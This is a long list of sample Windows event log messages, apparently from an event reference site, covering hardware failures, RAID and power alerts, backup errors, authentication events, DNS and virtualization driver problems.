>>> httpd.exe: Syntax error on line 116 of C:/Program Files (x86)/CollabNet Subversion Server/httpd/conf/httpd.conf: Cannot load C:/Program Files (x86)/CollabNet Subversion Server/httpd/modules/mod_dav_svn.so into server: The specified module could not be found.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Logoff
Message:
An account was logged off.

Subject:
Security ID: TESTGROUND\cacheduser
Account Name: cacheduser
Account Domain: TESTGROUND
Logon ID: 0xbed3f1

Logon Type: 2

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Logoff
Message:
User initiated logoff:

Subject:
Security ID: TESTGROUND\cacheduser
Account Name: cacheduser
Account Domain: TESTGROUND
Logon ID: 0xbed3f1

This event is generated when a logoff is initiated but the token reference count is not zero and the logon session cannot be destroyed. No further user-initiated activity can occur. This event can be interpreted as a logoff event.


Event ID:
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Redundancy lost
Redundancy unit: System Board PS Redundancy
Chassis location: Main System Chassis
Previous redundancy state was: Normal


Event ID:
Source:
cpqasm2
Message:
Power supply #1 has failed.


Event ID:
Source:
Server Agents
Category:
Events
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system is in a failed state. Restore power or replace the failed power supply.
Chassis: '0'; Bay: '1'
[SNMP TRAP: 6050 in CPQHLTH.MIB]


Event ID:
Source:
Server Agents
Category:
Events
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has lost redundancy. Restore power or replace any failed or missing power supplies.
Chassis: '0'
[SNMP TRAP: 6032 in CPQHLTH.MIB]


Event ID:
Source:
Server Agents
Category:
Events
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has been returned to the OK state.
Chassis: '0'; Bay: '1'
[SNMP TRAP: 6048 in CPQHLTH.MIB]


Event ID:
Source:
Server Agents
Category:
Events
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has returned to a redundant state.
Chassis: '0'
[SNMP TRAP: 6054 in CPQHLTH.MIB]


Event ID:
Source:
Trend Micro Security Server
Category:
System
Message:
Threat Alert
OfficeScan detected Cryp_Neb-2 on COMPUTERNAME(user.name) in MyDomain domains.
File: C:\Software\Infected.zip (Infected.exe)
Detection date: 6/17/2009 21:45:17
Action: No action



Event ID:
Source:
ap_notify
Category:
1184 (no category messagefile registered)
Message:
Error (9241), SMTP notification error: smtplib.SMTPException: No suitable authentication method found. (failure)
pid="3756:236"


Event ID:
Source:
LGTO_Sync
Message:
The description for Event ID ( 1 ) in Source ( LGTO_Sync ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: , Sync Stop done.


Event ID:
Source:
Service Control Manager
Message:
The following boot-start or system-start driver(s) failed to load: storflt


Event ID:
Source:
VMSMP
Message:
NIC driver on 'COMPUTER' cannot load because it is incompatible with the server virtualization stack. Server version 2 Client version 1 (VMID D03E098F-B772-4AC4-B434-37527FDEF56A).


Event ID:
Source:
Service Control Manager
Category:
Error
Message:
EVENT # 9697313
EVENT LOG System
EVENT TYPE Error
SOURCE Service Control Manager
EVENT ID 7011
COMPUTERNAME SERVER
DATE / TIME 7/28/2009 8:11:23 PM
MESSAGE Timeout (30000 milliseconds) waiting for a transaction response from the SharedAccess service.


Event ID:
Source:
Application error
Category:
100
Message:
Faulting application wmiprvse.exe, version 5.2.3790.0, faulting module ntdll.dll, version 5.2.3790.0, fault address 0x0002caa2.



Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for driver Netaapl (Apple Mobile Device Ethernet Service) changed from Running to Stopped.


Event ID:
Source:
DNS
Message:
The DNS server encountered a packet addressed to itself on IP address xxx.xxx.xxx.xxx. The packet is for the DNS name "au.download.windowsupdate.com.". The packet will be discarded. This condition usually indicates a configuration error.

Check the following areas for possible self-send configuration errors:
1) Forwarders list. (DNS servers should not forward to themselves).
2) Master lists of secondary zones.
3) Notify lists of primary zones.
4) Delegations of subzones. Must not contain NS record for this DNS server unless subzone is also on this server.
5) Root hints.

Example of self-delegation:
-> This DNS server dns1.example.microsoft.com is the primary for the zone example.microsoft.com.
-> The example.microsoft.com zone contains a delegation of bar.example.microsoft.com to dns1.example.microsoft.com,
(bar.example.microsoft.com NS dns1.example.microsoft.com)
-> BUT the bar.example.microsoft.com zone is NOT on this server.

Note, you should make this delegation check (with nslookup or DNS manager) both on this DNS server and on the server(s) you delegated the subzone to. It is possible that the delegation was done correctly, but that the primary DNS for the subzone, has any incorrect NS record pointing back at this server. If this incorrect NS record is cached at this server, then the self-send could result. If found, the subzone DNS server admin should remove the offending NS record.

You can use the DNS server debug logging facility to track down the cause of this problem.


Event ID:
Source:
Windows Server Update Services
Category:
Clients
Message:
Some client computers have not reported back to the server in the last 30 days. 4 have been detected so far.


Event ID:
Source:
EventSentry
Category:
Boot
Message:
The backup file for action "DBMYSQL" has events queued, but the "DBMYSQL" action is currently disabled. The backup file for this action has been backed up to file "C:\Windows\TEMP\eventsentry_backup_f98ff348-8384-4ae8-ae76-6818e4e13765.tmp.backup" and the original file has been deleted.



Event ID:
Source:
Security
Message:
User Account Locked Out


Event ID:
Source:
SQL Server ODBC driver support error
Message:
Unable to load SQL Server ODBC driver resource DLL. The application cannot continue.



Event ID:
Source:
EventSentry
Message:
The number of events cached for action "MSSQL Database", which has been unreachable, exceeded 8192 events. If this action is no longer in use then you should disable or delete the action so that events are no longer cached. EventSentry will continue to cache events until the maximum size of the temporary backup file "C:\WINDOWS\TEMP\eventsentry_backup_xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
..tmp" (32 Mb) is reached. 133952 events are currently cached, the backup
file size is 32 Mb.


Event ID:
Source:
McLogEvent
Category:
None
Message:
Would be blocked by port blocking rule (rule is in warn-only mode) (Anti-virus Standard Protection:Prevent mass mailing worms from sending mail).


Event ID:
Source:
System Restore
Message:
Failed to create restore point (Process = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Description = Scheduled Checkpoint; Error = 0x80070422).


Event ID:
Source:
Kerberos
Message:
The kerberos client received a KRB_AP_ERR_MODIFIED error from the server computerA$. The target name used was cifs/computerB.mydomain.local. This indicates that the password used to encrypt the kerberos service ticket is different than that on the target server. Commonly, this is due to identically named machine accounts in the target realm (MYDOMAIN.LOCAL), and the client realm. Please contact your system administrator.


Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for driver pssdk41 (PsSdk41) changed from Stopped to Running.

Additional Service Information:

Startup type: Manual
Executable: \??\C:\WINDOWS\system32\Drivers\pssdk41.sys



Event ID:
Source:
Microsoft-Windows-CAPI2
Category:
Application
Message:
Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddCoreCsiFiles : BeginFileEnumeration() failed.
System Error:
Access is denied.
..



Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
The PING status of host <HOSTNAME> remains at ERROR due to error "gethostbyname: The requested name is valid, but no data of the requested type was found. ".


Event ID:
Source:
FrontPage 5.0
Message:
Microsoft FrontPage Server Extensions:
Error #3005f Message: Unable to read configuration for Microsoft Internet Information Server.



Event ID:
Source:
MSExchangeFBPublish
Category:
General
Message:
Unable to prepare message table for polling thread processing on virtual machine WCC-EXCHANGE-4. The error number is 0x80040115. Make sure that the Microsoft Exchange Information Store service is running.


Event ID:
Source:
vmbus
Message:
The parent partition uses a different VMBus version. You need to Install a matching VMBus version in this guest installation.


Event ID:
Source:
storvsp
Message:
A storage device in 'COMPUTERNAME' cannot load because it is incompatible with the server virtualization stack. Server version 2.0 Client version 4.2(VMID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX).


Event ID:
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Log size is near or at capacity
Log type: ESM


Event ID:
Source:
HAL
Category:
System
Message:
The platform firmware has corrupted memory across the previous system power transition. Please check for updated firmware for your system.


Event ID:
Source:
Schannel
Message:
The following fatal alert was generated: 10. The internal error state is 10.

- System

- Provider

[ Name] Schannel
[ Guid] {1F678132-5938-4686-9FDC-C8FF68F15C85}

EventID 36888

Version 0

Level 2

Task 0

Opcode 0

Keywords 0x8000000000000000

- TimeCreated

[ SystemTime] 2009-10-29T14:17:42.310964400Z

EventRecordID 27115

Correlation

- Execution

[ ProcessID] 500
[ ThreadID] 4548

Channel System

Computer OfficePC

- Security

[ UserID] S-1-5-18


- EventData

AlertDesc 10
ErrorState 10



Event ID:
Source:
Windows Backup
Message:
File backup was cancelled by the user.


Event ID:
Source:
Server Agents
Category:
Events
Message:
Remote Insight Agent: The Remote Insight Board/Integrated Lights-Out has detected a controller interface error.
[SNMP TRAP: 9006 in CPQSM2.MIB]


Event ID:
Source:
VDS Basic Provider
Message:
Unexpected failure. Error code: 490@01010004


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host smtp.gmail.com due to error "Timeout.". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.

Unable to connect to SMTP host %1 due to error "%2". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.



Event ID:
Source:
EventSentry
Message:
Error during SMTP communication with SMTP host "192.168.1.48". After sending "." the following error occurred: "[10057] Socket is not connected".

Error during SMTP communication with SMTP host "%1". After sending "%2" the following error occurred: "%3".


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host 192.168.1.48 due to error [10060] Connection timed out. Will try backup smtp host smtp.gmail.com now.

Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.


Event ID:
Source:
EventSentry
Message:
Action "Event log to text file" was unable to create/open file "C:\EventSentry\eventsentry_events.txt" due to error: Access is Denied.

Action "%1" was unable to create/open file "%2" due to error: %3


Event ID:
Source:
Srv
Message:
While transmitting or receiving data, the server encountered a network error. Occassional errors are expected, but large amounts of these indicate a possible error in your network configuration. The error status code is contained within the returned data (formatted as Words) and may point you towards the problem.


Event ID:
Source:
Microsoft-Windows-Folder Redirection
Message:
Folder redirection policy application has been delayed until the next logon because the group policy logon optimization is in effect.


Event ID:
Source:
3wareDrv
Message:
AEN: SECTOR_REPAIR (port=1, LBA=0xEFFD80)


Event ID:
Source:
3wareDrv
Message:
AEN: DEGRADED_UNIT (unit=0, port=1)


Event ID:
Source:
EventSentry
Message:
EventSentry determined that the recommended management suite ("OpenManage") from the hardware manufacturer (Dell) is either not installed or not currently running on this server. Without this software, EventSentry will not be able to alert you of critical hardware warnings and/or errors, such as a hard drive failure in a RAID. Please visit the manufacturer's web site to obtain more information and install the recommended management suite.


Additional Information:

Manufacturer: Dell
Model: PowerEdge 1900
Bios Version: 2.2.6


Event ID:
Source:
SideBySide
Message:
Activation context generation failed for "somefile.dll".Error in manifest or policy file "Microsoft.VC90.CRT\Microsoft.VC90.CRT.MANIFEST" on line 4. Component identity found in manifest does not match the identity of the component requested. Reference is Microsoft.VC90.CRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b", type="win32", version="9.0.21022.8". Definition is Microsoft.VC90.CRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b", type="win32", version="9.0.30729.4148". Please use sxstrace.exe for detailed diagnosis.


Event ID:
Source:
DnsApi
Message:
The system failed to register host (A or AAAA) resource records for network adapter
with settings:

Adapter Name : {D37428FB-D073-4403-87B8-3941F1C3A2B4}
Host Name : MYSERVER
Primary Domain Suffix : mydomain.local
DNS server list :
fec0:0:0:ffff::1, fec0:0:0:ffff::2, fec0:0:0:ffff::3
Sent update to server : <?>
IP Address(es) :
192.168.111.1

Either the DNS server does not support the DNS dynamic update protocol or the authoritative zone for the specified DNS domain name does not accept dynamic updates.

To register the DNS host (A or AAAA) resource records using the specific DNS domain name and IP addresses for this adapter, contact your DNS server or network systems administrator.


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD missing: SasAddr=0x5000c50001cde56d, ArrayRef=1, RowIndex=0x3, EnclPd=0xff, Slot=5.
: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PDs missing from configuration at boot: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: VDs missing drives and will go offline at boot: 01: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Message:
Controller event log: VD 01/1 is now OFFLINE: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD 04(e0/s4) is not a certified drive: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
DCOM
Message:
DCOM got error "%2147944122" from the computer xxxxxx when attempting to activate the server:
xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxxx


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD 04(e0/s4) is not a certified drive: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
EventSentry
Message:
Action "MSSQL Database", invoked by feature, "Software
Monitoring" was unable to connect to the database due to error "[01000] [Microsoft][ODBC SQL Server Driver][TCP/IP Sockets]ConnectionOpen (Connect()). (11004)". EventSentry will queue events and continue to attempt the delivery of events.



Event ID:
Source:
PlugPlayManager
Message:
The device 'Storage miniport driver' (VMBUS\1481C722-3FBE-4DD2-9468-7D8F1396B27D\1&3189fc23&0&{1481c722-3fbe-4dd2-9468-7d8f1396b27d}) disappeared from the system without first being prepared for removal.


Event ID:
Source:
PlugPlayManager
Message:
The device 'Msft Virtual Disk SCSI Disk Device' (SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&240474ae&0&000000) disappeared from the system without first being prepared for removal.


Event ID:
Source:
Windows Backup
Message:
The backup did not complete because of an error writing to the backup location B:\. The error is: The backup location cannot be found or is not valid. Review your backup settings and check the backup location. (0x81000006).


Event ID:
Source:
Perflib
Category:
None
Message:
Windows cannot open the 64-bit extensible counter DLL aspnet_state in a 32-bit environment. Contact the file vendor to obtain a 32-bit version. Alternatively if you are running a 64-bit native environment, you can open the 64-bit extensible counter DLL by using the 64-bit version of Performance Monitor. To use this tool, open the Windows folder, open the System32 folder, and then start Perfmon.exe


Event ID:
Source:
storflt
Message:
The Virtual Storage Filter Driver is disabled through the registry. It is inactive for all disk drives.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
System Integrity
Message:
Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.

File Name: \Device\HarddiskVolume2\Windows\System32\l3codeca.acm


Event ID:
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Log size is full
Log type: ESM



Event ID:
Source:
MsiInstaller
Message:
Product: Adobe Reader 9.3 - Update '{AC76BA86-7AD7-0000-2550-7A8C40000934}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127


Event ID:
Source:
VMSMP
Message:
Networking driver on 'VMCOMPUTERNAME' loaded but has a different version from the server. Server version 3.2 Client version 0.2 (Virtual machine ID 041A17DA-19CF-4667-9253-48DBA40CB726). The device will work, but this is an unsupported configuration. This means that technical support will not be provided until this problem is resolved. To fix this problem, upgrade the integration services. To upgrade, connect to the virtual machine and select Insert Integration Services Setup Disk from the Action menu.


Event ID:
Source:
3wareDrv
Message:
AEN: APORT_TIMEOUT_DETECTED (port=0)


Event ID:
Source:
service control manager
Message:
The Debug Diagnostic service entered the running state


Event ID:
Source:
MSExchangeIS
Category:
Exchange VSS Writer
Message:
Exchange VSS Writer (instance 6c1b73a7-5922-480e-a8ef-f89e3b34780a:20) has unsuccessfully completed the backup of storage group 'First Storage Group'. No log files have been truncated for this storage group.


Event ID:
Source:
Microsoft-Windows-Backup
Category:
Application
Message:
%%2147942405


Event ID:
Source:
Microsoft-Windows-Eventlog
Message:
The security log is now full.


Event ID:
Source:
Microsoft-Windows-Eventlog
Message:
Event log automatic backup
Log: Security
File: C:\Windows\System32\Winevt\Logs\Archive-Security-2010-11-05-11-20-26-007.evtx



Event ID:
Source:
Perflib
Category:
none
Message:
The configuration information of the performance library "C:\WINDOWS\system32\perfts.dll" for the "TermService" service does not match the trusted performance library information stored in the registry. The functions in this library will not be treated as trusted.



Event ID:
Source:
Application Hang
Category:
101
Message:
Hanging application Customer.exe, version 6.0.16.0, hang module hungapp, version 0.0.0.0, hang address 0x00000000.



Event ID:
Source:
service control manager
Category:
none
Message:
The Distributed Transaction Coordinator service terminated with service-specific error 3221229584 (0xC0001010).


Event ID:
Source:
userenv
Category:
none
Message:
Windows cannot determine the associated site for this computer. (The RPC server is too busy to complete this operation. ). Group Policy processing aborted.


Event ID:
Source:
application error
Category:
100
Message:
Faulting application Ppcl.exe, version 8.1.660.0, faulting module ntdll.dll, version 5.2.3790.4455, fault address 0x0002860e.


Event ID:
Source:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has lost redundancy. Restore power or replace any failed or missing power supplies.
Chassis: '0'
[SNMP TRAP: 6032 in CPQHLTH.MIB]
Detected by application: Server Agents


Event ID:
Source:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system is in a failed state. Restore power or replace the failed power supply.
Chassis: '0'; Bay: '2'
[SNMP TRAP: 6050 in CPQHLTH.MIB]
Detected by application: Server Agents


Event ID:
Source:
MetaFrameEvents
Category:
Printer Management
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. Driver mapping is incorrect. Client name: (WI_0NZOY79v2OfWLkfXH) Printer: (FBC-HR-3700 on ps_1 (from WI_0NZOY79v2OfWLkfXH) in session 4) Client Printer driver: (HP COLOR LASERJET 3700 PCL 6) Server Printer driver: (HP Color LaserJet 3700 PCL 6)


Event ID:
Source:
NVRAIDSERVICE
Message:
Access failure: Critical error on disk XXXXXXX (Port: SATA 2.0).


Event ID:
Source:
nvrdx64
Message:
Error message from one of the disks failing on an onboard nVidia nForce4 RAID controller.


Event ID:
Source:
NVRAIDSERVICE
Message:
Error message from one of the disks failing on an onboard nVidia nForce4 RAID controller.


Event ID:
Source:
MSExchangeSA
Category:
Monitoring
Message:
The MAD Monitoring thread was unable to read the state of the services, error '0x80010108'.

For more information, click http://www.microsoft.com/contentredirect.asp.


Event ID:
Source:
Service Control Manager
Message:
________________________________________
EVENT # 170686
EVENT LOG System
EVENT TYPE Error
SOURCE Service Control Manager
EVENT ID 7034
COMPUTERNAME HDQ121
DATE / TIME 3/8/2011 3:29:02 PM
MESSAGE The McAfee Engine Service service terminated unexpectedly. It has done this 2 time(s).
________________________________________

Find out more about the event at http://www.myeventlog.com.




Event ID:
Source:
NSTSEC
Category:
1
Message:
The description for Event ID ( 256 ) in Source ( NSTSEC ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: [**NST**][PID:864;TID:960][CNSTCSPHelper is initializing!][FUNC=NSTSECProxy::NSTSECProxy::CNSTCSPHelper::Initialize][FILE=.\NSTCSPClient.cpp:LINE=36]



Event ID:
Source:
MSExchange ActiveSync
Category:
Configuration
Message:
The setting ExternalProxy in the Web.Config file was not valid. The previous value was null and has been changed to .


Event ID:
Source:
DCOM
Category:
None
Message:
The server {8C53F4F9-90F5-4CA0-A8FE-76ECF5FBD2CF} did not register with DCOM within the required timeout.


Event ID:
Source:
SQLBrowser
Category:
None
Message:
The configuration of the AdminConnection\TCP protocol in the SQL instance BLACKBERRY is not valid.


Event ID:
Source:
VSS
Message:
Volume Shadow Copy Service error: Failed resolving account ACCOUNTNAME with status 1376. Check connection to domain controller and VssAccessControl registry key.
Operation:
Gather writers' status
Executing Asynchronous Operation
Context:
Current State: GatherWriterStatus
Error-specific details:
Error: NetLocalGroupGetMemebers(ACCOUNTNAME), 0x80070560, The specified local group does not exist.



Event ID:
Source:
SBCore
Message:
This computer must be configured as a domain controller. To prevent this computer from shutting down in the future, run Setup on the disk that you used to install the operating system to configure the computer as a domain controller.


Event ID:
Source:
WinMgmt
Message:
A provider, TPVCGProv, has been registered in the WMI namespace, Root\ThinPrint, but did not specify the HostingModel property. This provider will be run using the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests. Ensure that provider has been reviewed for security behavior and update the HostingModel property of the provider registration to an account with the least privileges possible for the required functionality.


Event ID:
Source:
NTBackup
Message:
NTBackup error: 'The operation failed. Consult the Backup Report for more details.'


Event ID:
Source:
Microsoft-Windows-RPC-Events
Message:
Possible Memory Leak. Application ("C:\Windows\system32\mmc.exe" "C:\Windows\system32\dhcpmgmt.msc" ) (PID: 6320) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({6BFFD098-A112-3610-9833-46C3F874532D}), Method number (2). User Action: Contact your application vendor for an updated version of the application.


Event ID:
Source:
Microsoft-Windows-WindowsUpdateClient
Category:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for SQL Server 2008 R2 (KB2494088).


Event ID:
Source:
Security
Category:
Logon/Logoff
Message:
Logon Failure:
Reason: Unknown user name or bad password
User Name: FIRST LAST
Domain: USER-PC
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: USER-PC
Caller User Name: -
Caller Domain: -
Caller Logon ID: -
Caller Process ID: -
Transited Services: -
Source Network Address: 0.0.0.0
Source Port: 0



Event ID:
Source:
3wareDrv
Category:
None
Message:
FW: AEN 0x10D:


Event ID:
Source:
Microsoft-SharePoint Products-SharePoint Foundation Search
Category:
Gatherer
Message:
The mount operation for the gatherer application 00000000-0000-0000-0000-000000000000 has failed because the schema version of the search administration database is less than the minimum backwards compatibility schema version supported for this gatherer application. The database might not have been upgraded.


Event ID:
Source:
dmvsc
Message:
The Dynamic Memory driver failed because dynamic memory is not supported on this release of Windows.


Event ID:
Source:
q57w2k
Message:
HP NC7781 Gigabit Server Adapter: The network link is down. Check to make sure the network cable is properly connected.


Event ID:
Source:
ESE
Message:
Information Store
2140
12



Event ID:
Source:
Schannel
Message:
The SSL server credential's certificate does not have a private key information property attached to it. This most often occurs when a certificate is backed up incorrectly and then later restored. This message can also indicate a certificate enrollment failure.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Other Policy Change Events
Message:
One or more errors occured while processing security policy in the group policy objects.

Error Code: 87
GPO List:
{F0DF8E32-7E0A-4B67-1234-9BD831BFE64C} Windows Audit & Event Log Settings
{AAC1786C-016F-11D2-9012-00C04fB984F9} Default Domain Controllers Policy
{91B2F340-016D-11D2-1234-00C04FB984F9} Default Domain Policy



Event ID:
Source:
Security
Category:
System Event
Message:
The system time was changed.
Process ID: 1296
Process Name: C:\WINDOWS\system32\EVENTSENTRY\eventsentry_svc.exe
Primary User Name: WEBSERVER$
Primary Domain: MYDOMAIN
Primary Logon ID: (0x0,0x3E7)
Client User Name: WEBSERVER$
Client Domain: MYDOMAIN
Client Logon ID: (0x0,0x3E7)
Previous Time: 8:57:01 PM 8/31/2011
New Time: 8:57:06 PM 8/31/2011


Event ID:
Source:
Microsoft-Windows-CAPI2
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.


Event ID:
Source:
Microsoft-Windows-Resource-Exhaustion-Detector
Category:
Resource Exhaustion Diagnosis Events
Message:
Windows successfully diagnosed a low virtual memory condition. The following programs consumed the most virtual memory: SomeProcess.exe (848) consumed 372129792 bytes, Procmon64.exe (3616) consumed 209563648 bytes, and devenv.exe (6364) consumed 201162752 bytes.


Event ID:
Source:
MSSQLSERVER
Category:
Server
Message:
Server is listening on [ 'any' <ipv4> 1433]


Event ID:
Source:
Security
Category:
Policy Change
Message:
System Security Access Granted:
Access Granted: SeBatchLogonRight
Account Modified: DOMAINA\username
Assigned By:
User Name: SERVERNAME$
Domain: DOMAINA
Logon ID: (0x0,0x3E7)



Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller log file entry: Physical Disk 1:0:4 Controller 0, Connector 1


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Unexpected sense. SCSI sense data: Sense key: 3 Sense code: 11 Sense qualifier: 0: Physical Disk 1:0:4 Controller 0, Connector 1


Event ID:
Source:
Userenv
Message:
Windows cannot perform filter check for Group Policy object CN={<GUID>}CN=PoliciesCN=SystemDC=DOMAINDC=local. Group Policy processing aborted.


Event ID:
Source:
cpqasm2
Message:
The power sub-system is no longer redundant.


Event ID:
Source:
HP Sensor
Category:
System Power
Message:
A power supply has failed. (Power Supply 1)

User Action
Check the failed power supply and replace if necessary.

WBEM Indication Properties
AlertingElementFormat: 2 0x2 (CIMObjectPath)



Event ID:
Source:
HP Sensor
Category:
System Power
Message:
Power redundancy has been lost. (Power Redundancy Set 1)

User Action
Check the power supply configuration and check the status of the power redundancy. Ensure the system is being powered adequately. Add or replace power supplies if necessary.

WBEM Indication Properties
AlertingElementFormat: 2 0x2 (CIMObjectPath)


Event ID:
Source:
Windows Backup
Message:
The backup was not successful. The error is: There is not enough space on this drive to save the backup. Free up space by deleting older backups and unnecessary data or change your backup settings. (0x81000005).


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
The RAID controller firmware and driver validation was not performed. The configuration file is out of date or corrupted. C:\Program Files (x86)\Dell\SysMgt\sm\cfg\: Controller 0 (SAS 6/iR Integrated)


Event ID:
Source:
Schannel
Category:
System
Message:
The following fatal alert was received: 46


Event ID:
Source:
Server Agents
Category:
System
Message:
System Information Agent: Health: Fault Tolerant Power Supply Removed. A hot-plug fault tolerant power supply has been removed from the system.
Chassis: '0'; Bay: '2'
[SNMP TRAP: 6034 in CPQHLTH.MIB]


Event ID:
Source:
USER32
Category:
NONE
Message:
The attempt to power off [Computer Name] failed



Event ID:
Source:
Service Control Manager
Message:
The start type of the Windows Modules Installer service was changed from auto start to demand start.


Event ID:
Source:
PostgreSQL
Message:
ERROR: permission denied for relation SomeTable STATEMENT: select COLUMN1 from SomeTable where COLUMN2=5


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
MPSSVC Rule-Level Policy Change
Message:
Windows Firewall ignored a rule because its major version number is not recognized.

Profile: All

Ignored Rule:
ID: clr_optimization_v4.0.30319_32-1
Name: -


Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
A driver was added:

Name: mraid35x (Mraid35x)
Status: Stopped
Startup type: Automatic
Executable: \SystemRoot\system32\drivers\mraid35x.sys






Event ID:
Source:
EventSentry
Message:
The ODBC driver for action "24hour" in the EventSentry Agent has been automatically adjusted to use "SQL Server Native Client 10.0", which is the latest version installed on this system. Dynamically added connection options: MARS_Connection=yes.



Event ID:
Source:
hpdiags
Message:
The description for Event ID ( 105 ) in Source ( hpdiags ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details.


Event ID:
Source:
EventSentry Network Services
Category:
Snmp Trap
Message:
A SNMP trap was received:

Version: 1
Community: public
Trap Sender: vmware1.domain.local (192.168.12.55)
Trap ID: vmware.vmwProductSpecific.vmwESX.vmkLoaded (1.3.6.1.4.1.6876.4.1.6.1)

Trap Bindings:
1: vmware.vmwTraps.vmwVmID (1.3.6.1.4.1.6876.50.101) = 1
2: vmware.vmwTraps.vmwVmConfigFilePath (1.3.6.1.4.1.6876.50.102) = /vmfs/volumes/474c55f6-89ccc558-5555-001143ebb975/TestServerF/TestServerF.vmx
3: vmware.vmwVirtMachines.vmwVmTable.vmwVmEntry.vmwVmDisplayName.1 (1.3.6.1.4.1.6876.2.1.1.2.1) = TEST07-W2K3-DE


Event ID:
Source:
EventSentry Network Services
Category:
Snmp Trap
Message:
A SNMP trap was received:

Version: 3
Username: public
Trap Sender: ups41.domain.local (192.168.16.117)
Trap ID: apc (1.3.6.1.4.1.318.0.10)
Engine ID: 0x800000000300C0B74DD7A6
Security Level: Authentication and Privacy

Trap Bindings:
1: apc.apcmgmt.mtrapargs.mtrapargsString (1.3.6.1.4.1.318.2.3.3.0) = UPS: Passed a self-test.



Event ID:
Source:
EventSentry Network Services
Category:
Syslog
Message:
syslog@vmserver5.domain.local[daemon.warning]: Server Administrator: Storage Service EventID: 2264 A device is missing.: Battery 0 Controller 0


Event ID:
Source:
Security
Category:
System Event
Message:
Unable to log events to security log:
Status code: 0xc0000008
Value of CrashOnAuditFail: 0
Number of failed audits: 103


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The EventSentry agent is experiencing an unusually high handle count (5001 handles) and/or high memory usage (48324564 bytes), which is most likely due to a known issue in Windows Server 2003 SP2 (http://support.microsoft.com/kb/938135). It is highly recommended that you navigate to http://support.microsoft.com/kb/938135 to download and install the hotfix to resolve this issue. It is not recommended that you continue to run the agent for an extended time period without installing the Microsoft hotfix.

Failure to install the hotfix may eventually result in system instability or a system crash. Installation of the hotfix will require a reboot.


Event ID:
Source:
AtBroker
Message:
GetSessionValue Failed to Open session value return error 2


Event ID:
Source:
Microsoft-Windows-Service Pack Installer
Message:
